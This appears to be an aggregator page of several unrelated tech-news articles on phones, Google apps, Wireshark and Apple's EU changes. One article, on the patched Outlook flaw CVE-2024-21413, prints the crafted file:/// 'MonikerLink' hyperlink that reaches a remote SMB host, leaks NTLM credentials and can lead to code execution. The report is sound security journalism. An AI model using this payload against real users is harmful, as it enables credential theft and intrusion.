Google announces changes to Docs, Sheets and Slides comments sections

0
[ad_1]

Google plans to implement important changes to comments sections of Docs, Sheets and Slides, the Mountain View company announced this week. This is an attempt to offer users an improved comments experience in these apps, so here are the main key features that are coming next month.

Firstly, Google is adding new ways to interact with comments that can be selected by going to View / Comments. For example, users will be able to click the new “Show all comments” option to open a full-length view to peruse through multiple comments more easily.

Also, the updated search and filter functionality will make it easier to find what you’re looking for. A curated “For you” list will also be added, which brings up all the comments that require action.

Another helpful new feature coming to Docs and Slides in just a few weeks is the option to expand comments. Basically, users will be able to see comments next to the document or presentation content, thus making it easier to review them alongside the content they’re working on.

Furthermore, Google Docs and Sheets users will be getting the ability to minimize comments. This specific feature will reduce comments to icons allowing for a more focused view of the content in these apps. It’s also important to add that this setting will offer users a quick preview with a bunch of info about who is commenting.

Last but not least, the option to hide comments is one of the most important features coming next month to all three Google apps: Docs, Sheets, and Slides.

The new features announced this week will be available to all Google Workspace customers, Google Workspace Individual subscribers, as well as users with personal Google accounts. The roll-out is expected to start on March 1 and should take about three days.


[ad_2]
Source link

New Outlook 0-day RCE Flaw Exploited in the Wild

0
[ad_1]

Outlook has been discovered to have an interesting vulnerability while handling specific hyperlinks, which was found to be exploited by threat actors in the wild. This vulnerability has been assigned with CVE-2024-21413, and the severity was given as 9.8 (Critical).

However, Microsoft has addressed this vulnerability and fixed it as part of their Patch Tuesday release of February 2024. Successful exploitation of this vulnerability could allow a threat actor to bypass the Office-protected view and open a file in editing mode instead of the “protected mode.”

Document
Live Account Takeover Attack Simulation

Live attack simulation Webinar demonstrates various ways in which account takeover can happen and practices to protect your websites and APIs against ATO attacks.

Outlook 0-day RCE Flaw

According to the Checkpoint report, if the hyperlink starts with http:// or https://, Outlook uses Windows’s default browser to open the URL. However, if there are any other protocols like the “Skype” URL protocol, clicking on the hyperlink will display a security warning.

Microsoft Warning Notice (Source: Checkpoint)
Microsoft Warning Notice (Source: Checkpoint)

In other cases, like the “file://” protocol, Outlook did not display a warning dialog box. Instead, it had an error message in the Windows Notification Center, and the resource that was tried to access through the link was also not accessed.

If the file was accessed, there is a high chance that the local NTLM credential information could have been leaked.

Windows Notification Center Warning Message (Source: Checkpoint)
Windows Notification Center Warning Message (Source: Checkpoint)

A slight modification in the “file://” protocol link bypasses the previously shown security restriction and proceeds to access the resource. For testing purposes, the below link was used, which successfully accessed the “test.rtf” file on the remote resource.

<a href=”file:///\\10.10.111.111\test\test.rtf!something”>CLICK ME</a>

As stated by researchers, accessing this resource uses the SMB protocol that leaks the local NTLM credential information during the process. Moreover, researchers also tried escalating this attack vector to arbitrary code execution. 

Moniker Link string uses the “look up” for COM (Component Object Model) objects on Windows. Outlook calls the ole32!MkParseDisplayName() API for doing this job. As per Microsoft’s API document for Moniker, including “!” makes it a composite moniker.

Exploitation

Researchers used this composite moniker with FileMoniker (\\10.10.111.111\test\test.rtf) + ItemMoniker (something) for accessing Microsoft Word. Windows runs Microsoft Word as a COM server in the background.

If the hyperlink is clicked, Word opens and parses the file “test.rtf” based on the string “\\10.10.111.111\test\test.rtf”. However, this test.rtf is controlled by the attacker, which was further modified to perform arbitrary code execution on the remote system using “WINWORD.EXE”.

Researchers stated this #MonikerLink bug/attack vector may be present in other software and also recommend developers check and fix the issue.

Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.


[ad_2]
Source link

HONOR confirms another Porsche Design phone is coming

0
[ad_1]

HONOR has just confirmed that another Porsche Design smartphone is coming. This info has been shared by HONOR’s Chief Designer and the Head of Design at Porsche Lifestyle Group. Yuan and Carsten Monnerjan revealed as much in a joint interview that will soon be published in the ‘Wallpaper’ magazine. We got some info from HONOR beforehand.

Both designers shared their creative philosophy when it comes to bringing premium products to the market. They focused on the luxury segment of smart devices, of course. The interview also contains details regarding the overall development approach adopted in jointly shaping new products.

HONOR & Porsche Design will deliver yet another phone, soon

The main takeaway from this interview is the announcement of a new collaboration. HONOR and Porsche Design will bring yet another product to global markets, in addition to the Porsche Design HONOR Magic V2 RSR.

If we had to guess, we’d say that they’re talking about the Porsche Design HONOR Magic6 Pro. That is the only other HONOR smartphone that was mentioned in relation to Porsche Design, albeit in rumor/leaks only.

The HONOR Magic6 Pro has already been launched in China, and it will arrive to global markets during the Mobile World Congress (MWC) in Barcelona later this month. That’s also where HONOR and Porsche Design could show us the second product from their collab. Alternatively, it may arrive at a later date, we’ll see.

The HONOR Magic6 Pro is probably the device in question, and it will feature a different design

The Porsche Design variant of the HONOR Magic6 Pro will likely have identical internals to the regular model, but a different shell. We’re expecting a nice-looking back side, as the one the Porsche Design HONOR Magic V2 RSR delivered.

HONOR will focus on the HONOR Magic6 Pro and Porsche Design HONOR Magic V2 RSR in Barcelona, though. Those are the two newest and hottest products the company has to offer. The company’s press event will take place on February 25 at 2 PM CET (Barcelona time).


[ad_2]
Source link

Leak reveals official cases for Samsung’s Galaxy A35 & A55

0
[ad_1]

As anticipation builds for Samsung’s Galaxy A35 and Galaxy A55, the frequency of leaks continues to go up. Days after the duo showed up in a new set of renders revealing four color variants, we have images of their official accessories. The company has readied a bunch of protective cases for its upcoming mid-range smartphones.

Samsung will offer several official cases for the Galaxy A35 and Galaxy A55

According to a report by Appuals, customers of the Galaxy A35 and Galaxy A55 will be able to pick from five different case designs, at least when buying official cases—there will be numerous third-party options. Samsung will offer its popular Smart View Wallet Case for both models in Black, White, and Purple colors.

This case comes with a front cover featuring a tiny window to quickly check out AOD and perform basic functions like answering the phone and controlling music playback. On the underside of the front cover is a card holder, so the case doubles up as your wallet. It is also available for flagship devices such as the Galaxy S24 series.

Next up, Samsung has readied a silicone cover for the Galaxy A55 and Galaxy A35 in Black, Lime, and Blue colors. It is a standard silicone case that protects the frame and the rear panel of the device. The former model will also get a Standing Grip Case in Blue and Grey colors. Lastly, there will be a transparent case and a semi-transparent case for the duo.

Additionally, the Korean behemoth will offer a 2-piece Screen Protector bundle for the Galaxy A55 and Galaxy A35. The bundle should come with a complete set of tools to help you apply the protector at home. The publication reports that these official Samsung accessories for the Galaxy A55 and Galaxy A35 will be priced between €10 and €60.

The mid-range duo might debut soon

A few days back, Samsung officially published the repairability scores for the Galaxy A55 and Galaxy A35. It has also put up support pages for the mid-range duo on its website in some markets. All of this indicates a nearing launch of the phones. The company might unveil them in March or April. The former will be a more premium model, featuring a metallic frame and a more powerful processor. It might also get better cameras, though there are rumors about a camera upgrade for the latter. Stay tuned for the official launch.


[ad_2]
Source link

Prescriptive Mitigation Guidance, Power to ICS Security

0
[ad_1]

Imagine a cascading blackout, disrupted pipelines, or manipulated manufacturing processes – all orchestrated through a cyberattack. This chilling reality paints a stark picture of the escalating cyber threats targeting Industrial Control Systems (ICS). 

Addressing these challenges effectively requires specialized expertise. Risk Assessment & Mitigation (RAM2) professional services come in here. One breach can have devastating consequences, impacting profits, public safety, and environmental well-being.

Prescriptive Mitigation Guidance

Prescriptive Mitigation Guidance empowers organizations to move beyond simply identifying vulnerabilities. It starts with thoroughly assessing systems, networks, and processes, meticulously uncovering potential weaknesses. But it doesn’t stop there. It then prioritizes risks based on their severity, likelihood of exploitation, and potential impact. This laser focus ensures that organizations address the most critical threats first. 

The guidance delves deeper with clear priorities, recommending specific mitigation strategies for each vulnerability. This could involve patching software, implementing access controls, configuring security settings, or raising employee awareness. 

Prescriptive Guidance vs Its Descriptive Counterpart

Prescriptive mitigation steps in with a laser focus instead of simply highlighting vulnerabilities. Like descriptive guidance would. It tailors actions directly to the organization’s unique needs and risks, offering more relevant and actionable insights. 

This tailored approach fosters a proactive security culture, urging organizations to actively address vulnerabilities before they become exploitable entry points for cyber threats.

Benefits of Prescriptive Mitigation Guidance

Beyond immediate defense, Prescriptive Mitigation Guidance builds a fortress: reduced attack risks, optimal resource allocation, and maximized security spending. It’s a shield and a budgeter all in one. ️ It also plays a crucial role in regulatory compliance. Its alignment with industry-recognized standards and best practices streamlines the compliance process, saving valuable time and effort.

Furthermore, the clear and actionable steps increased efficiency by streamlining security processes, allowing teams to work more effectively. Prescriptive Mitigation Guidance is a comprehensive shield, offering immediate protection and long-term efficiency and compliance benefits.

Technology environments are prime targets, often reliant on legacy systems and facing unique vulnerabilities. In this critical landscape, Prescriptive Mitigation Guidance emerges as a beacon of hope, offering tangible benefits and bolstering organizational defenses.

  • A Shield for Legacy Technology.
  • Speeding Up the Response.
  • Building Resilience for the Future.

Why Prescriptive Mitigation Guidance is Crucial for OT Security

Generic cybersecurity advice crumbles in the face of OT complexities. Focused on IT, it blindsides OT’s unique tech, exposing vulnerabilities. Vague “patch” recommendations lack specifics for your organization’s OT setup, forcing security teams to decipher generic advice on the fly. 

Generic advice fumbles, Prescriptive Guidance dissects. It deep-dives into OT specifics, tackling vulnerabilities tailored to your organization’s unique setup. No more one-size-fits-all, just laser-focused protection.

With Prescriptive Mitigation Guidance, organizations can move beyond generic advice and gain a powerful tool to shield their unique OT environment from ever-evolving cyber threats. 

6 Necessary Elements of Effective Prescriptive Mitigation in ICS Security

Step-by-Step Clarity: Practical guidance skips the “what’s wrong” and provides a clear “how to fix it” plan, like instructions for building a machine. 

Tailored to Threats and Environments: Generic cybersecurity advice falls flat in the face of diverse OT needs. Practical guidance adapts to each, offering specific solutions for unique vulnerabilities.

Real-Time Agility: Practical guidance acknowledges this fluidity and provides mechanisms for updates and revisions as new threats emerge or vulnerabilities are discovered. It shouldn’t be a static document but a living resource that adapts to the changing battlefield.

Transparency and Rationale: Trust is vital in cybersecurity. Practical guidance doesn’t just dictate actions; it explains the rationale behind each recommendation. This transparency fosters understanding and buy-in from technical teams.

Measurable Outcomes: Effective guidance goes beyond simply outlining actions; it establishes metrics for measuring success. By defining and tracking metrics, organizations can assess the effectiveness of their mitigation efforts and make necessary adjustments.

Integration with Existing Processes: Guidance that exists in a silo is less practical. It should integrate seamlessly with existing security processes and frameworks for seamless implementation. 

Conclusion

The industrial world thrives on innovation, but a growing threat of cyberattacks lies beneath the humming machinery. Operational Technology (OT) environments, often reliant on legacy systems and lacking robust security, become prime targets for attackers seeking disruption. 

In this dangerous landscape, Prescriptive Mitigation Guidance emerges as a critical shield, offering a structured approach to proactively address vulnerabilities and fortify organizational defenses.


[ad_2]
Source link

ASUS Zenfone 11 Ultra gets benchmarked with Snapdragon 8 Gen 3

0
[ad_1]

The ASUS ZenFone 11 Ultra is coming, and the phone just surfaced on a benchmarking tool with the Snapdragon 8 Gen 3 SoC. Geekbench, the benchmarking tool in question, did reveal a couple of additional tidbits about the phone too.

Before we get to it, do note that the phone did surface in images on several occasions thus far. Its specifications have also appeared, so we knew what to expect out of it. It will essentially be a somewhat redesigned ASUS ROG Phone 8.

The ASUS ZenFone 11 Ultra gets benchmarked as we’re waiting for more info about its launch

Having said that, the phone managed to score 2,226 points in the single-core test, and 6,949 points in the multi-core test. The Snapdragon 8 Gen 3 is mentioned in the listing, and the same goes for 16GB of RAM.

ASUS ZenFone 11 Ultra Geekbench

That is pretty much everything that the listing shares with us. This phone does look like the ASUS ROG Phone 8, but it has a slightly different camera island without the ‘ROG’ branding. The same goes for its backplate.

Its specifications did surface about a week and a half ago. A 6.78-inch fullHD+ (2400 x 1080) display was mentioned. That is an LTPO panel with a refresh rate that goes from 1 to 120Hz during regular usage. It can go up to a max of 144Hz for games.

The phone will include a 5,500mAh battery, and support 65W charging

A 5,500mAh battery was also mentioned, and the same goes for 65W wired charging. The phone will also support 15W wireless charging, and include an audio jack. Stereo speakers will also be included, and they’ll be optimized by Dirac.

A 50-megapixel main camera (Sony’s IMX890 sensor) will be included on the back, along with a 13-megapixel ultrawide camera (120-degree FoV). A 32-megapixel telephoto shooter (3x optical zoom) will also be a part of the package. On the front, you’ll be able to find a 32-megapixel camera.

The ASUS ZenFone 11 Ultra will arrive in five colors. Those colors are Eternal Black, Skyline Blue, Misty Gray, Verdure Green, and Desert Sienna. All of them are shown in the featured image.


[ad_2]
Source link

Wireshark 4.2.3 Released – What’s New!

0
[ad_1]

Wireshark is backed by the nonprofit Wireshark Foundation, which relies on your support to advance protocol analysis education.

However, Wireshark 4.2.3 is out now, and this new version is Packed with multiple new features, rich protocol support, user-friendly design, and powerful filtering tools for real-time network analysis.

This new version of Wireshark (Wireshark 4.2.3) was launched with several bug fixes, enhanced protocol support, and additional advancements.

What’s New?

Wireshark 4.2.3 or later must be manually downloaded and installed if you update Wireshark 4.2.0 or 4.2.1 on Windows.

Bug Fixes

Here below, we have mentioned all the bug fixes:-

  • Capture start fails when file set enabled and file extension not supplied if directory contains a period. Issue 14614.
  • Cannot drag and move custom filter buttons in toolbar. Issue 19447.
  • Not equal won’t work when used with wlan.addr. Issue 19449.
  • sshdump fails to connect with private key (ssh-rsa) Issue 19510.
  • ChmodBPF installation fails on macOS Sonoma 14.1.2. Issue 19527.
  • Windows installers should check for Windows 8.1. Issue 19569.
  • Fuzz job crash output: fuzz-2024-01-05-7725.pcap. Issue 19570.
  • Fuzz job crash output: fuzz-2024-01-06-7734.pcap. Issue 19578.
  • Incorrect recursion depth assert failure when dissecting a legitimate GOOSE message. Issue 19580.
  • OPC UA – large read request is reported as malformed in 4.2.1 but not in 4.0.12. Issue 19581.
  • TFTP dissector bug type listed as netscii instead of netascii doesn’t show all TFTP packets including TFTP blocks. Issue 19589.
  • SMB1 replies from LAN Drive app only show up as NBSS Continuation Message. Issue 19593.
  • ciscodump – older SSH key exchange algorithms not supported. Issue 19594.
  • Problem decoding LAPB/X.25/FTAM after adding X.75 decoding. Issue 19595.
  • Wireshark Filter not working. Issue 19604.
  • CFLOW: failure to decode 0 length data fields of IPFIX variable length data types. Issue 19605.
  • Copy …​as Printable Text Feature Missing in 4.1/4.2. Issue 19607.
  • Export Objects – HTTP is missing some HTTP/2 files in a two-pass analysis. Issue 19609.
  • ASAM-CMP Plugin: Malformed message, length mismatch if vendor defined data of status messages has odd length. Issue 19626.
  • OSS-Fuzz 66561: wireshark:fuzzshark_ip_proto-udp: Null-dereference READ in wmem_map_lookup. Issue 19642.

Updated Protocol Support

Here below we have mentioned updated protocol support:-

  • ASAM CMP
  • CAN
  • CFLOW
  • CMIP
  • CMP
  • DAP
  • DICOM
  • DISP
  • E2AP
  • GLOW
  • GOOSE
  • GTP
  • GTPv2
  • H.225
  • H.245
  • H.248
  • HTTP2
  • IEEE 1609.2
  • IEEE 1722
  • IPv4
  • IPv6
  • ISO 15765
  • ISUP
  • ITS
  • Kerberos
  • LDAP
  • MMS
  • NBT
  • NRUP
  • openSAFETY
  • P22
  • P7
  • PARLAY
  • RTMPT
  • RTP
  • SCSI
  • SOME/IP
  • T.38
  • TCP
  • TECMP
  • TFTP
  • WOW
  • X.509if
  • X.509sat
  • X.75
  • X11
  • Z39.50
  • ZigBee Green Power

New and Updated Capture File Support

Here below we have mentioned all the new and updated capture file support:-

Besides this, Linux and Unix vendors offer their own Wireshark packages, but installing or updating via the platform’s package management system is recommended.

Moreover, to find the default locations on your system, you can use:-

Help › About Wireshark › Folders or tshark -G folders

To Download

Wireshark’s website lists all the third-party packages, while if you want to get the latest version (Wireshark 4.2.3), then from the official download page, you can download it.

Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.


[ad_2]
Source link

Google’s Pixel becomes official phone of National Women’s Soccer League

0
[ad_1]

Soccer (also called Football by everyone except US people) is one of the fastest-growing sporting events in the US. With superstars like Lionel Messi coming to Inter Miami, more people around the globe become viewers of Major League Soccer (MLS). Meanwhile, women’s soccer in the US is also on the rise. Google is now using this opportunity to promote Pixel devices.

Google has announced a multi-year partnership with the US National Women’s Soccer League to promote Pixel phones. The Pixel devices are now the “Official Fan Phone” of NWSL and provide fans with exclusive content, game highlights, and information about teams and players.

Google Pixel is now the official phone of the US National Women’s Soccer League

As per Google’s announcement, the NWSL’s social media channels will rely on Pixel’s leading AI-powered camera to capture moments. The “Pitchside with Pixel” program also shares behind-the-scenes moments with Pixel users watching the US women’s soccer matches. Google’s partnership covers the NWSL Playoffs and Championship.

“We are thrilled to welcome Google, a global leader in groundbreaking innovation and connectivity, to the NWSL family as our postseason and LCC content sponsor,” said NWSL Chief Marketing and Commercial Officer Julie Haddon.

This is not the first time Google has sponsored a sporting league to promote Pixel devices. The tech firm announced a partnership with the NBA in 2021 and extended the contract following the Pixel 8 Pro launch.

Similarly, Google Pixel is the “Official Fan Phone of the NBA.” Google also sponsors Women’s Basketball and Women’s World Cup (FIBA) to promote Pixel devices. In soccer, Google is the official partner of Arsenal and Liverpool Football Club in the English Premier League.

The collaboration between Google Pixel and the NWSL comes at a time when women’s sports are gaining increased recognition and visibility on a global scale. By sponsoring women’s events, Google can further promote its gender equality programs and give women a better chance of recognition.


[ad_2]
Source link

It’s not a bug! Apple is compelled to remove Home Screen web apps from iOS in the EU due to the DMA

0
[ad_1]
What many thought was a bug has turned out to be a move made on purpose by Apple as the latter will not allow web apps on the iOS Home Screen in the European Union. On its Developer support page (via 9to5Mac), Apple notes that the EU’s Digital Market Act (DMA) requires it to allow users to select a browser that doesn’t use Apple’s WebKit browser engine for the first time. Because of this, Apple said that it had to remove the Home Screen web apps.
Apple says Home Screen web apps on iOS are built on WebKit and they “align with the privacy and security model for native apps on iOS.” This is important and Apple goes on to say, “That integration means Home Screen web apps are managed to align with the security and privacy model for native apps on iOS, including isolation of storage and enforcement of system prompts to access privacy impacting capabilities on a per-site basis.”
However, without this isolation and enforcement, malicious web apps could read data from other web apps and even use their permissions to access the user’s camera and microphone without his or her consent. Browsers could also install web apps without the consent or awareness of the user.

Apple adds, “Addressing the complex security and privacy concerns associated with web apps using alternative browser engines would require building an entirely new integration architecture that does not currently exist in iOS and was not practical to undertake given the other demands of the DMA and the very low user adoption of Home Screen web apps. And so, to comply with the DMA’s requirements, we had to remove the Home Screen web apps feature in the EU.”

Apple adds, “EU users will be able to continue accessing websites directly from their Home Screen through a bookmark with minimal impact to their functionality.” The tech giant also was forced to remove support for Home Screen web apps on Safari in the EU because the DMA requires equality for all browsers. Since third-party browsers can’t have Home Screen web apps, neither can Safari.

The absence of Home Screen web apps in the EU was first noticed with the release of iOS 17.4 beta 2. The changes will come to all iOS users in the 27 member EU states once iOS 17.4 is released in the first week of March.

[ad_2]
Source link

Google CEO actually uses over 20 phones simultaneously

0
[ad_1]

Being the CEO of a tech company worth trillions of dollars isn’t certainly a job for everyone and requires a high level of commitment and conscientiousness. That’s why these CEOs are taking home tens of millions of dollars a year. But have you ever wondered what gadgets these CEOs use? It’s pretty predictable that the Apple CEO only uses iPhones. But what about Google whose operating system is used by dozens of companies?

Believe it or not, Google CEO is using over 20 different phones

In a recent interview, Google CEO Sundar Pichai revealed he uses over 20 different smartphones simultaneously, and the reason behind this habit is apparent. Currently, Android has over three billion active users, and in 2015, Google announced nearly 1,300 brands have produced over 24,000 distinct Android devices.

Since Android runs on most of the best-selling phones, Pichai wants to ensure Google services and apps are working properly on every device. He might also want to determine changes that need to be made on future Android releases.

Google CEO didn’t mention the names of the 20 phones he used at the same time. However, devices from popular brands like Samsung, Xiaomi, OnePlus, etc, are the most likely options. It also won’t be surprising to see Pichai using an iPhone to monitor his company’s biggest rival.

Sundar Pichai encourages users & parents to enable two-factor authentication

Meanwhile, Sundar Pichai encourages Android users to enable two-factor authentication instead of changing their passwords. Pichai believes this could be a more secure method to keep accounts safe. Additionally, he suggested parents should set personal limits rather than strict rules to keep their kids off the phone.

In another part of his interview, Pichai talked about the importance of AI and even compared it with fire and electricity.

Pichai’s speech comes at a time when Google staff are raising their voice against his way of governing the company. For instance, a staff software engineer at Google has recently criticized the company for lacking a visionary leader. The employee also alluded to the burnouts and lack of passion among company staff that stems from weak leadership.


[ad_2]
Source link